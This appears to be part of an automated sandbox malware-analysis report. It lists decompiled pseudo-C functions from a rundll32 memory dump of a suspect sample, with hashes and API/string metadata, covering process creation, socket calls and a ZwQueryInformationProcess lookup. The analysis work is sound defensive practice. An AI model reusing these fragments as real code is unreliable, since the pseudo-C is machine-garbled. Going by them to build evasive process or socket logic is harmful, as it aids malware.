                				if (__eflags == 0) goto 0xc8097c4c;
                				if (r8b != 0) goto 0xc8097c52;
                				if ((_t8 & 0x00000004) != 0) goto 0xc8097c5c;
                				if ((_t8 & 0x00000002) != 0) goto 0xc8097c99;
                				goto 0xc8097cd6;
                				return _t8;
                			}







                APIs
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: ExceptionThrow
                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                • API String ID: 432778473-1866435925
                • Opcode ID: 630905e449d0313d16b455eea44e9d9020c95c9599d2484d6dfed617e88adc5d
                • Instruction ID: 28311737140513ce336104c2ffac501fff440870af1f598093c00764c6e464d5
                • Opcode Fuzzy Hash: 630905e449d0313d16b455eea44e9d9020c95c9599d2484d6dfed617e88adc5d
                • Instruction Fuzzy Hash: 77215066F22F3598FB01DF64E8456EC2371F750788F90C513EA5A26956EF2CD249CB80
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 31%
                			E00000285285C808DD20(void* __ecx, void* __edx, long long __rbx, long long __rcx, long long* __rdx) {
                				void* __rsi;
                				void* __rbp;
                				void* __r14;
                				void* __r15;
                				int _t93;
                				void* _t109;
                				long long _t116;
                				long long _t117;
                				long long _t118;
                				long long _t119;
                				intOrPtr _t126;
                				void* _t152;
                				void* _t154;
                				void* _t157;
                				void* _t158;
                				void* _t160;
                				void* _t161;
                				void* _t178;
                				intOrPtr* _t179;
                				long long _t181;
                				void* _t183;
                				long long* _t184;
                				void* _t186;
                				long long _t187;
                
                				_t110 = __edx;
                				_t109 = __ecx;
                				 *((long long*)(_t160 + 0x10)) = __rdx;
                				_t158 = _t160 - 0xa0;
                				_t161 = _t160 - 0x1a0;
                				 *((long long*)(_t158 - 0x18)) = 0xfffffffe;
                				 *((long long*)(_t161 + 0x1f8)) = __rbx;
                				_t184 = __rdx;
                				_t187 = __rcx;
                				r13d = 0;
                				 *((intOrPtr*)(_t161 + 0x50)) = r13d;
                				 *((long long*)(_t158 + 0xe0)) = __rcx;
                				E00000285285C8090000(__rbx,  *((intOrPtr*)(__rcx + 0xd8)), _t158 + 0xe0, _t154, _t158);
                				_t179 = _t187 + 0x80;
                				if ( *_t179 == r13d) goto 0xc808de34;
                				_t126 =  *((intOrPtr*)( *((intOrPtr*)(_t187 + 0xd8)) + 8));
                				_t116 =  *((intOrPtr*)(_t126 + 8));
                				 *((long long*)(_t158 - 0x60)) = _t116;
                				 *((long long*)(_t158 - 0x58)) = _t116;
                				 *((long long*)(_t158 - 0x50)) = _t181;
                				E00000285285C8089960(__edx, _t116, _t126, _t158 + 0x50, _t158,  *((intOrPtr*)(_t116 + 0x10)) + 0x68, _t158 - 0x60, __rdx, _t187, _t186, _t183);
                				_t117 =  *((intOrPtr*)(_t126 + 0x10));
                				 *((long long*)(_t158 - 0x48)) = _t117;
                				 *((long long*)(_t158 - 0x40)) = _t117;
                				 *((long long*)(_t158 - 0x38)) = _t181;
                				E00000285285C8089960(_t110, _t117, _t126, _t158 + 0x68, _t158,  *((intOrPtr*)(_t117 + 0x10)) + 0x68, _t158 - 0x48, __rdx, _t187, _t181, _t178);
                				_t118 =  *((intOrPtr*)(_t126 + 0x18));
                				 *((long long*)(_t158 - 0x30)) = _t118;
                				 *((long long*)(_t158 - 0x28)) = _t118;
                				 *((long long*)(_t158 - 0x20)) = _t181;
                				E00000285285C8089960(_t110, _t118, _t126, _t158 + 0x80, _t158,  *((intOrPtr*)(_t118 + 0x10)) + 8, _t158 - 0x30, __rdx, _t187, _t152, _t154);
                				 *__rdx = _t181;
                				 *((long long*)(__rdx + 8)) = _t181;
                				 *((long long*)(__rdx + 0x10)) = _t181;
                				E00000285285C808C940(_t118, __rdx + 0x18, _t158 + 0x80, _t157);
                				 *((short*)(__rdx + 0x28)) = 1;
                				 *((intOrPtr*)(_t161 + 0x50)) = 1;
                				goto 0xc808e023;
                				_t119 =  *((intOrPtr*)(_t187 + 0x78));
                				 *((long long*)(_t161 + 0x48)) = _t187 + 0xe0;
                				 *((long long*)(_t161 + 0x40)) = _t119;
                				 *((long long*)(_t161 + 0x38)) =  *((intOrPtr*)(_t187 + 0xb8));
                				 *((long long*)(_t161 + 0x30)) =  *((intOrPtr*)(_t187 + 0xd0));
                				 *((intOrPtr*)(_t161 + 0x28)) =  *_t187;
                				 *((intOrPtr*)(_t161 + 0x20)) =  *((intOrPtr*)(_t187 + 0xb0));
                				_t93 = CreateProcessA(??, ??, ??, ??, ??, ??, ??, ??, ??, ??);
                				asm("movups xmm1, [esi]");
                				asm("movdqu [ebp-0x10], xmm1");
                				asm("movsd xmm0, [esi+0x10]");
                				asm("movsd [ebp], xmm0");
                				asm("movups [esp+0x58], xmm1");
                				asm("movsd [esp+0x68], xmm0");
                				asm("movdqa xmm0, [0x84874]");
                				asm("movdqu [ebp-0x10], xmm0");
                				asm("xorps xmm0, xmm0");
                				asm("movdqu [esp+0x70], xmm0");
                				if ( *((intOrPtr*)(_t187 + 0x98)) == 0) goto 0xc808dee2;
                				asm("lock inc ecx");
                				E00000285285C8071690(_t126, _t161 + 0x70,  *((intOrPtr*)(_t187 + 0x90)), _t187 + 0xe0, _t158,  *((intOrPtr*)(_t187 + 0x98)), __rdx);
                				 *(_t158 - 0x80) = 1;
                				CloseHandle(??);
                				CloseHandle(??);
                				if (_t93 == 0) goto 0xc808dfe2;
                				 *_t179 = r13d;
                				E00000285285C808C080(_t161 + 0x00000070 | 0xffffffffffffffff,  *((intOrPtr*)(_t187 + 0x90)));
                				 *((long long*)(_t179 + 8)) = _t119;
                				 *((long long*)(_t158 + 0xf0)) = _t187;
                				E00000285285C8090100(_t126,  *((intOrPtr*)(_t187 + 0xd8)), _t158 + 0xf0);
                				if ( *_t179 == 0) goto 0xc808df8e;
                				 *((long long*)(_t158 - 0x70)) = _t187;
                				 *((long long*)(_t158 - 0x68)) = _t179;
                				asm("movaps xmm0, [ebp-0x70]");
                				asm("movdqa [ebp+0x30], xmm0");
                				E00000285285C808E660( *_t179, _t119,  *((intOrPtr*)(_t187 + 0xd8)));
                				 *_t184 = _t181;
                				 *((long long*)(_t184 + 8)) = _t181;
                				 *((long long*)(_t184 + 0x10)) = _t181;
                				E00000285285C808C940(_t119, _t184 + 0x18, _t158 + 0xf0);
                				 *((short*)(_t184 + 0x28)) = 1;
                				 *((intOrPtr*)(_t161 + 0x50)) = 1;
                				E00000285285C808A460(_t119, _t126, _t161 + 0x58, _t187 + 0xe0);
                				goto 0xc808e023;
                				asm("movups xmm0, [esp+0x58]");
                				asm("inc ecx");
                				asm("movsd xmm1, [esp+0x68]");
                				asm("repne inc ecx");
                				asm("movdqa xmm0, [0x84785]");
                				asm("movdqu [esp+0x58], xmm0");
                				 *((long long*)(_t184 + 0x18)) =  *(_t161 + 0x70);
                				 *((long long*)(_t184 + 0x20)) =  *((intOrPtr*)(_t161 + 0x78));
                				asm("xorps xmm0, xmm0");
                				asm("movdqu [esp+0x70], xmm0");
                				 *((char*)(_t184 + 0x28)) =  *(_t158 - 0x80) & 0x000000ff;
                				 *((char*)(_t184 + 0x29)) =  *(_t158 - 0x7f) & 0x000000ff;
                				 *(_t158 - 0x80) = 0;
                				goto 0xc808df77;
                				E00000285285C80886E0( *((intOrPtr*)(_t161 + 0x78)), _t126, _t158 + 0x40);
                				asm("movups xmm0, [eax]");
                				asm("movaps [ebp-0x70], xmm0");
                				E00000285285C80880C0(_t109, _t110, _t126, _t158 + 8, _t158 - 0x70, _t187 + 0xe0, _t158, " CreateProcess failed");
                				 *((long long*)(_t158 + 8)) = 0xc810fa28;
                				return E00000285285C80C9940(_t126, _t158 + 8, 0xc813bb58, _t187 + 0xe0);
                			}




























                APIs
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: CloseHandle$CreateErrorExceptionLastProcessThrow
                • String ID: CreateProcess failed
                • API String ID: 4160235580-2682455881
                • Opcode ID: 640137e91375ac19db5ae25c6535f8ce21ea7dfe50142579e9fc247d86508d75
                • Instruction ID: 6d67dd0c101248ac2b1f9f935c8490f52d58f807bada8852ff3325b045ee5759
                • Opcode Fuzzy Hash: 640137e91375ac19db5ae25c6535f8ce21ea7dfe50142579e9fc247d86508d75
                • Instruction Fuzzy Hash: 74918936602FA089E310CF64E8487DE77B4F7887A8F519216EF9867695EF78C185CB40
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00000285285C806DCB0(void* __eax, void* __rcx, long long __rdx, void* __r8, long long __r9, long long _a16, long long _a32, long long _a40) {
                				intOrPtr _t50;
                				intOrPtr _t51;
                
                				_a32 = __r9;
                				_a16 = __rdx;
                				if (__rcx == __r8) goto 0xc806dce6;
                				_t50 =  *((intOrPtr*)(__rcx + 8));
                				if (0x66666665 - _t50 - 1 < 0) goto 0xc806dd4a;
                				 *((long long*)(__rcx + 8)) = _t50 + 1;
                				 *((long long*)(__r8 + 8)) =  *((long long*)(__r8 + 8)) - 1;
                				 *((long long*)( *((intOrPtr*)(__r9 + 8)))) = _a40;
                				 *((long long*)( *((intOrPtr*)(_a40 + 8)))) = _a16;
                				 *((long long*)( *((intOrPtr*)(_a16 + 8)))) = _a32;
                				_t51 = _a16;
                				 *((long long*)(_t51 + 8)) =  *((intOrPtr*)(_a40 + 8));
                				 *((long long*)(_a40 + 8)) =  *((intOrPtr*)(_a32 + 8));
                				 *((long long*)(_a32 + 8)) =  *((intOrPtr*)(_t51 + 8));
                				return __eax;
                			}






                APIs
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Concurrency::cancel_current_task$ExceptionThrowstd::bad_alloc::bad_alloc
                • String ID: list<T> too long
                • API String ID: 2386360001-4027344264
                • Opcode ID: 8c3d43a86d18826729c4a74967e66e581c383eb1c22cc10e142ec2daa4007e92
                • Instruction ID: dc6aac229751ad06e3441d83221091dde96243b2b41e8d0ddd4bd1b8fe8c80e2
                • Opcode Fuzzy Hash: 8c3d43a86d18826729c4a74967e66e581c383eb1c22cc10e142ec2daa4007e92
                • Instruction Fuzzy Hash: 7251577A202F9482DA00EF1AE499259B7E4F788BE0F15C622DE9D577A4DE79C491CB00
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 85%
                			E00000285285C80E7C88(signed int __ecx, void* __edx, long long __rbx, void* __rdx, long long __rsi, long long _a8, long long _a16) {
                				signed int _t27;
                				signed int _t28;
                				signed int _t29;
                				signed int _t30;
                				signed int _t31;
                				signed int _t43;
                				signed int _t44;
                				signed int _t45;
                				signed int _t47;
                				void* _t52;
                
                				_a8 = __rbx;
                				_a16 = __rsi;
                				_t27 = __ecx & 0x0000001f;
                				if ((__ecx & 0x00000008) == 0) goto 0xc80e7cb9;
                				if (__edx >= 0) goto 0xc80e7cb9;
                				E00000285285C80E31F4(_t27, _t52);
                				_t28 = _t27 & 0xfffffff7;
                				goto 0xc80e7d10;
                				_t43 = 0x00000004 & dil;
                				if (_t43 == 0) goto 0xc80e7cd4;
                				asm("dec eax");
                				if (_t43 >= 0) goto 0xc80e7cd4;
                				E00000285285C80E31F4(_t28, _t52);
                				_t29 = _t28 & 0xfffffffb;
                				goto 0xc80e7d10;
                				_t44 = dil & 0x00000001;
                				if (_t44 == 0) goto 0xc80e7cf0;
                				asm("dec eax");
                				if (_t44 >= 0) goto 0xc80e7cf0;
                				E00000285285C80E31F4(_t29, _t52);
                				_t30 = _t29 & 0xfffffffe;
                				goto 0xc80e7d10;
                				_t45 = dil & 0x00000002;
                				if (_t45 == 0) goto 0xc80e7d10;
                				asm("dec eax");
                				if (_t45 >= 0) goto 0xc80e7d10;
                				if ((dil & 0x00000010) == 0) goto 0xc80e7d0d;
                				E00000285285C80E31F4(_t30, _t52);
                				_t31 = _t30 & 0xfffffffd;
                				_t47 = dil & 0x00000010;
                				if (_t47 == 0) goto 0xc80e7d2a;
                				asm("dec eax");
                				if (_t47 >= 0) goto 0xc80e7d2a;
                				E00000285285C80E31F4(_t31, _t52);
                				return 0 | (_t31 & 0xffffffef) == 0x00000000;
                			}














                APIs
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: _set_statfp
                • String ID:
                • API String ID: 1156100317-0
                • Opcode ID: 2011e68a8fb9851642cd3d370e902918837add7e0efacca9b0130383fcbbf733
                • Instruction ID: 27ccb2be142f0dc4451f1d8ca6088b135695280f0e4ecea8b76c1ff97c8b9666
                • Opcode Fuzzy Hash: 2011e68a8fb9851642cd3d370e902918837add7e0efacca9b0130383fcbbf733
                • Instruction Fuzzy Hash: 7211022E70AF7105F6681128F44E37B4451EB463B1F19CA2EEBE2236E6DE2C88414B01
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 65%
                			E00000285285C80CBD10(void* __edx, signed int __edi, void* __ebp, intOrPtr* __rax, long long __rbx, void* __rcx, void* __rdx, signed int __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
                				void* _t70;
                				intOrPtr _t81;
                				unsigned int _t89;
                				signed int _t96;
                				signed int _t98;
                				char _t100;
                				signed int _t104;
                				unsigned int _t113;
                				void* _t135;
                				signed int _t145;
                
                				_t145 = __rsi;
                				_a8 = __rbx;
                				_a16 = __rbp;
                				_a24 = __rsi;
                				_t135 = __rcx;
                				if ( *((intOrPtr*)(__rcx + 0x468)) != __rsi) goto 0xc80cbd4a;
                				_t70 = E00000285285C80D3944(__rax);
                				 *__rax = 0x16;
                				E00000285285C80CAABC(_t70);
                				goto 0xc80cbef9;
                				if ( *((intOrPtr*)(__rcx + 0x18)) == __rsi) goto 0xc80cbd32;
                				 *((intOrPtr*)(__rcx + 0x470)) =  *((intOrPtr*)(__rcx + 0x470)) + 1;
                				if ( *((intOrPtr*)(__rcx + 0x470)) == 2) goto 0xc80cbef6;
                				_t104 = __edi | 0xffffffff;
                				 *((intOrPtr*)(__rcx + 0x50)) = 0;
                				 *(__rcx + 0x2c) = 0;
                				goto 0xc80cbec3;
                				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 1;
                				if ( *((intOrPtr*)(__rcx + 0x28)) < 0) goto 0xc80cbed8;
                				if ( *((intOrPtr*)(__rcx + 0x41)) - 0x20 - 0x5a > 0) goto 0xc80cbda0;
                				_t130 =  *((char*)(__rcx + 0x41));
                				goto 0xc80cbda2;
                				_t89 = ( *(__rcx + 0xc81002b0) & 0x000000ff) >> 4;
                				 *(__rcx + 0x2c) = _t89;
                				if (_t89 == 8) goto 0xc80cbf0e;
                				_t113 = _t89;
                				if (_t113 == 0) goto 0xc80cbeb7;
                				if (_t113 == 0) goto 0xc80cbea3;
                				if (_t113 == 0) goto 0xc80cbe6e;
                				if (_t113 == 0) goto 0xc80cbe42;
                				if (_t113 == 0) goto 0xc80cbe3a;
                				if (_t113 == 0) goto 0xc80cbe0d;
                				if (_t113 == 0) goto 0xc80cbe00;
                				if (_t89 - 0xfffffffffffffffc != 1) goto 0xc80cbf1e;
                				E00000285285C80CCCD8( *((char*)(__rcx + 0x41)), __rcx, __rcx, __rsi, 0xc81002b0);
                				goto 0xc80cbebf;
                				E00000285285C80CC73C(_t130, _t135);
                				goto 0xc80cbebf;
                				if ( *((char*)(_t135 + 0x41)) == 0x2a) goto 0xc80cbe24;
                				E00000285285C80CB9FC(_t135, _t135, _t135 + 0x38);
                				goto 0xc80cbebf;
                				 *((long long*)(_t135 + 0x20)) =  *((long long*)(_t135 + 0x20)) + 8;
                				_t96 =  *( *((intOrPtr*)(_t135 + 0x20)) - 8);
                				_t97 =  <  ? _t104 : _t96;
                				 *(_t135 + 0x38) =  <  ? _t104 : _t96;
                				goto 0xc80cbe6a;
                				 *(_t135 + 0x38) = 0;
                				goto 0xc80cbec3;
                				if ( *((char*)(_t135 + 0x41)) == 0x2a) goto 0xc80cbe4e;
                				goto 0xc80cbe17;
                				 *((long long*)(_t135 + 0x20)) =  *((long long*)(_t135 + 0x20)) + 8;
                				_t98 =  *( *((intOrPtr*)(_t135 + 0x20)) - 8);
                				 *(_t135 + 0x34) = _t98;
                				if (_t98 >= 0) goto 0xc80cbe6a;
                				 *(_t135 + 0x30) =  *(_t135 + 0x30) | 0x00000004;
                				 *(_t135 + 0x34) =  ~_t98;
                				goto 0xc80cbebf;
                				_t81 =  *((intOrPtr*)(_t135 + 0x41));
                				if (_t81 == 0x20) goto 0xc80cbe9d;
                				if (_t81 == 0x23) goto 0xc80cbe97;
                				if (_t81 == 0x2b) goto 0xc80cbe91;
                				if (_t81 == 0x2d) goto 0xc80cbe8b;
                				if (_t81 != 0x30) goto 0xc80cbec3;
                				 *(_t135 + 0x30) =  *(_t135 + 0x30) | 0x00000008;
                				goto 0xc80cbec3;
                				 *(_t135 + 0x30) =  *(_t135 + 0x30) | 0x00000004;
                				goto 0xc80cbec3;
                				 *(_t135 + 0x30) =  *(_t135 + 0x30) | 0x00000001;
                				goto 0xc80cbec3;
                				 *(_t135 + 0x30) =  *(_t135 + 0x30) | 0x00000020;
                				goto 0xc80cbec3;
                				 *(_t135 + 0x30) =  *(_t135 + 0x30) | 0x00000002;
                				goto 0xc80cbec3;
                				 *(_t135 + 0x30) = _t145;
                				 *((intOrPtr*)(_t135 + 0x40)) = sil;
                				 *(_t135 + 0x38) = _t104;
                				 *((intOrPtr*)(_t135 + 0x3c)) = 0;
                				 *((intOrPtr*)(_t135 + 0x54)) = sil;
                				goto 0xc80cbec3;
                				if (E00000285285C80CC420(_t135) == 0) goto 0xc80cbf1e;
                				_t100 =  *((intOrPtr*)( *((intOrPtr*)(_t135 + 0x18))));
                				 *((char*)(_t135 + 0x41)) = _t100;
                				if (_t100 != 0) goto 0xc80cbd78;
                				 *((long long*)(_t135 + 0x18)) =  *((long long*)(_t135 + 0x18)) + 1;
                				if ( *((intOrPtr*)(_t135 + 0x2c)) == 0) goto 0xc80cbee3;
                				if ( *((intOrPtr*)(_t135 + 0x2c)) != 7) goto 0xc80cbf0e;
                				 *((intOrPtr*)(_t135 + 0x470)) =  *((intOrPtr*)(_t135 + 0x470)) + 1;
                				if ( *((intOrPtr*)(_t135 + 0x470)) != 2) goto 0xc80cbd6d;
                				return  *((intOrPtr*)(_t135 + 0x28));
                			}














                APIs
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: _invalid_parameter_noinfo
                • String ID: $*
                • API String ID: 3215553584-3982473090
                • Opcode ID: f52ae4847fa9419645cbaf3967d967969e9c3a329a324c659f092c552a6c69fe
                • Instruction ID: 7e2a1d4cb2cc288c6e1e6fc6a50f7fca4ad858c97aa397ccb5e9bb132ef88e0d
                • Opcode Fuzzy Hash: f52ae4847fa9419645cbaf3967d967969e9c3a329a324c659f092c552a6c69fe
                • Instruction Fuzzy Hash: 5B61747A606B7096E7699F39906936D3BE0F306F48F14911BDB4622299CF38C481DF46
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: AddressHandleModuleProc
                • String ID: ZwQueryInformationProcess$ntdll.dll
                • API String ID: 1646373207-132032222
                • Opcode ID: d655376752550ca0c6d4ae3c3a63118fda60ee9f0094e96fdfb3eba170af42ae
                • Instruction ID: 86633f84d5db1fb137e56f43a6b7aaf9466aa6b075287d5d3b5c17ba7dc5d4f2
                • Opcode Fuzzy Hash: d655376752550ca0c6d4ae3c3a63118fda60ee9f0094e96fdfb3eba170af42ae
                • Instruction Fuzzy Hash: 4C518A79312FA082EF65CF19E80439937A0FB88BC4F44802A9A5D67798DF3DD605CB80
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 30%
                			E00000285285C80DFE44(void* __edx, void* __esp, void* __eflags, long long __rbx, void* __rcx, long long __rdi, long long __rsi, void* __r8) {
                				int _t35;
                				int _t38;
                				signed long long _t76;
                				signed long long _t78;
                				intOrPtr* _t86;
                				signed long long _t93;
                				signed long long _t108;
                				void* _t109;
                				void* _t110;
                				void* _t111;
                
                				_t110 = _t109 - 0x60;
                				_t108 = _t110 + 0x30;
                				 *((long long*)(_t108 + 0x60)) = __rbx;
                				 *((long long*)(_t108 + 0x68)) = __rsi;
                				 *((long long*)(_t108 + 0x70)) = __rdi;
                				_t76 =  *0xc814c720; // 0xee50a592130
                				 *(_t108 + 0x20) = _t76 ^ _t108;
                				r13d = __edx;
                				r15d = r9d;
                				E00000285285C80CA5D4(_t76 ^ _t108, __rbx, _t108, __rcx);
                				if ( *((intOrPtr*)(_t108 + 0x88)) != 0) goto 0xc80dfe97;
                				_t78 =  *((intOrPtr*)(_t108 + 8));
                				 *(_t108 + 0x90) =  ~( *(_t108 + 0x90));
                				r9d = r15d;
                				asm("sbb edx, edx");
                				 *(_t110 + 0x28) =  *(_t110 + 0x28) & 0x00000000;
                				 *(_t110 + 0x20) =  *(_t110 + 0x20) & 0x00000000;
                				_t35 = MultiByteToWideChar(??, ??, ??, ??, ??, ??);
                				if (_t35 != 0) goto 0xc80dfecb;
                				goto 0xc80dffbc;
                				_t104 = _t35 + _t35;
                				_t15 = _t104 + 0x10; // 0x18
                				asm("dec eax");
                				if ((_t15 & _t78) == 0) goto 0xc80dff55;
                				_t18 = _t104 + 0x10; // 0x18
                				_t93 = _t18;
                				asm("dec eax");
                				_t19 = _t104 + 0x10; // 0x18
                				if ((_t78 & _t93) - 0x400 > 0) goto 0xc80dff33;
                				asm("dec eax");
                				_t20 = (_t93 & _t19) + 0xf; // 0x27
                				if (_t20 - (_t93 & _t19) > 0) goto 0xc80dff15;
                				E00000285285C80C5A80();
                				_t111 = _t110 - 0xfffffff0;
                				_t86 = _t111 + 0x30;
                				if (_t86 == 0) goto 0xc80dffa4;
                				 *_t86 = 0xcccc;
                				goto 0xc80dff4f;
                				asm("dec eax");
                				E00000285285C80D3D7C(0xffffffffffffff0, _t93 & _t19 & 0xfffffff0);
                				if (0xfffffff0 == 0) goto 0xc80dff57;
                				 *((intOrPtr*)(0xffffffffffffff0)) = 0xdddd;
                				goto 0xc80dff57;
                				if (0xfffffff0 == 0) goto 0xc80dffa4;
                				E00000285285C80C8EF0( *((intOrPtr*)(_t78 + 0xc)), 0, 0, __esp, 0xfffffff0, __rcx, _t35 + _t35, _t35 + _t35);
                				r9d = r15d;
                				 *((intOrPtr*)(_t111 + 0x28)) = r14d;
                				 *((long long*)(_t111 + 0x20)) = 0xfffffff0;
                				_t38 = MultiByteToWideChar(??, ??, ??, ??, ??, ??);
                				if (_t38 == 0) goto 0xc80dffa4;
                				r8d = _t38;
                				GetStringTypeW(??, ??, ??, ??);
                				goto 0xc80dffa6;
                				if (0xfffffff0 == 0) goto 0xc80dffbc;
                				if ( *((intOrPtr*)(0xffffffffffffff0)) != 0xdddd) goto 0xc80dffbc;
                				E00000285285C80DA780(0xffffffffffffff0, 0xffffffffffffff0);
                				if ( *((char*)(_t108 + 0x18)) == 0) goto 0xc80dffcd;
                				 *( *_t108 + 0x3a8) =  *( *_t108 + 0x3a8) & 0xfffffffd;
                				return E00000285285C80C59D0(r13d,  *(_t108 + 0x20) ^ _t108, 0xfffffff0,  *((intOrPtr*)(_t108 + 0x80)));
                			}














                APIs
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: ByteCharMultiWide$StringType
                • String ID: %02x
                • API String ID: 3586891840-560843007
                • Opcode ID: 50be4d76a5020c7621fae6dd6c17a6d71fff3724fac27709a11fefaade9f821a
                • Instruction ID: f8227310f82b17680748f45a98708285d265cab369ac239cfdd2fb94472a09d4
                • Opcode Fuzzy Hash: 50be4d76a5020c7621fae6dd6c17a6d71fff3724fac27709a11fefaade9f821a
                • Instruction Fuzzy Hash: 7C41923A312FA04AEF218F65D8087996391FB45BA8F48C627AA5D577D4DF3CC545CB00
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 15%
                			E00000285285C8061DF0(long long __rax, long long __rbx, long long __rcx, signed char* __rdx, long long __rsi, void* __r9, void* __r10, long long __r13, intOrPtr _a8, long long _a16, long long _a24, long long _a32) {
                				char _v64;
                				long long _v72;
                				long long _v80;
                				long long _v88;
                				intOrPtr _v104;
                				signed char _t40;
                				void* _t42;
                				void* _t55;
                				long long _t80;
                				long long _t81;
                				long long _t105;
                				long long _t106;
                				long long _t107;
                				long long _t119;
                				void* _t124;
                
                				_t105 = __rsi;
                				_t83 = __rbx;
                				_t80 = __rax;
                				r12d = 0;
                				_t124 = __r9;
                				if (__rcx == 0xffffffff) goto 0xc8061fd9;
                				_a16 = __rbx;
                				if (r8b == 0) goto 0xc8061e6e;
                				_t40 =  *__rdx & 0x000000ff;
                				if ((_t40 & 0x00000008) == 0) goto 0xc8061e6e;
                				_a8 = r12d;
                				_v88 = __rcx;
                				_v80 = __rcx;
                				 *__rdx = _t40 | 0x00000008;
                				_v72 = _t119;
                				r8d = 0x80;
                				_v104 = 4;
                				__imp__#21();
                				_t42 = E00000285285C8061CE0(0xff00 | (_t40 | 0x00000008) != 0x00000000, __rbx,  &_v88, __rdx, __rsi);
                				__imp__#3();
                				E00000285285C8061CE0((0xff00 | (_t40 | 0x00000008) != 0x00000000) & 0xffffff00 | _t42 != 0x00000000, _t83, __r9, __rdx, _t105);
                				if (_t42 == 0) goto 0xc8061fd5;
                				_a24 = _t105;
                				_a32 = __r13;
                				E00000285285C805F380(__r9, __rdx);
                				_t106 = _t80;
                				_v88 = _t80;
                				_v80 = _t80;
                				if ( *((intOrPtr*)(_t106 + 8)) + 0xda812030 - 1 <= 0) goto 0xc8061ed8;
                				 *((intOrPtr*)( *_t106 + 0x30))();
                				goto 0xc8061eda;
                				_t21 =  &_v64; // 0x4d54ee85da812018
                				_t81 = _t80 + 2;
                				_v88 = 0x2733;
                				_v72 = _t81;
                				_t93 = __r9;
                				asm("movsd xmm1, [ebp-0x20]");
                				_v80 = _t106;
                				asm("movups xmm0, [ebp-0x30]");
                				asm("movsd [ebp-0x8], xmm1");
                				asm("movups [ebp-0x18], xmm0");
                				if (E00000285285C8060200(_t83, __r9, _t21) != 0) goto 0xc8061f7c;
                				E00000285285C805F380(_t93, _t21);
                				_t107 = _t81;
                				_v88 = _t81;
                				_v80 = _t81;
                				if ( *((intOrPtr*)(_t107 + 8)) + 0xda812030 - 1 <= 0) goto 0xc8061f42;
                				 *((intOrPtr*)( *_t107 + 0x30))();
                				goto 0xc8061f44;
                				_t29 =  &_v64; // 0x4d54ee85da812018
                				_v88 = 0x4d5;
                				_v72 = _t81 + 2;
                				asm("movsd xmm1, [ebp-0x20]");
                				_v80 = _t107;
                				asm("movups xmm0, [ebp-0x30]");
                				asm("movsd [ebp-0x8], xmm1");
                				asm("movups [ebp-0x18], xmm0");
                				_t55 = E00000285285C8060200(_t83, _t124, _t29);
                				if (_t55 == 0) goto 0xc8061fae;
                				_a8 = r12d;
                				__imp__#10();
                				 *__rdx =  *__rdx & 0x000000fc;
                				__imp__#3();
                				E00000285285C8061CE0(0x80046600 | _t55 != 0x00000000, _t83, _t124, _t29, _t107);
                				return _t55;
                			}



















                APIs
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: closesocket$ioctlsocketsetsockopt
                • String ID:
                • API String ID: 566113833-0
                • Opcode ID: efa8571a8444c449b1d94ebecc2b80b89608ef7e52b86e5e4d7699ec720f0bdf
                • Instruction ID: 84f192c8cd43838210ed2195b75ee26fe557071ec538bd100be448133db008b0
                • Opcode Fuzzy Hash: efa8571a8444c449b1d94ebecc2b80b89608ef7e52b86e5e4d7699ec720f0bdf
                • Instruction Fuzzy Hash: 9A518036B11F608AF760CF76A8453AE33B4F749B98F048116EE9967B86DF38C0958714
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 92%
                			E00000285285C80D3B0C(signed int __edx, void* __edi, void* __esp, intOrPtr* __rax, long long __rbx, signed int* __rcx, void* __rdx, long long __rsi, void* __r8, long long _a8, long long _a24, signed short _a32, intOrPtr _a40) {
                				void* _v8;
                				char _v16;
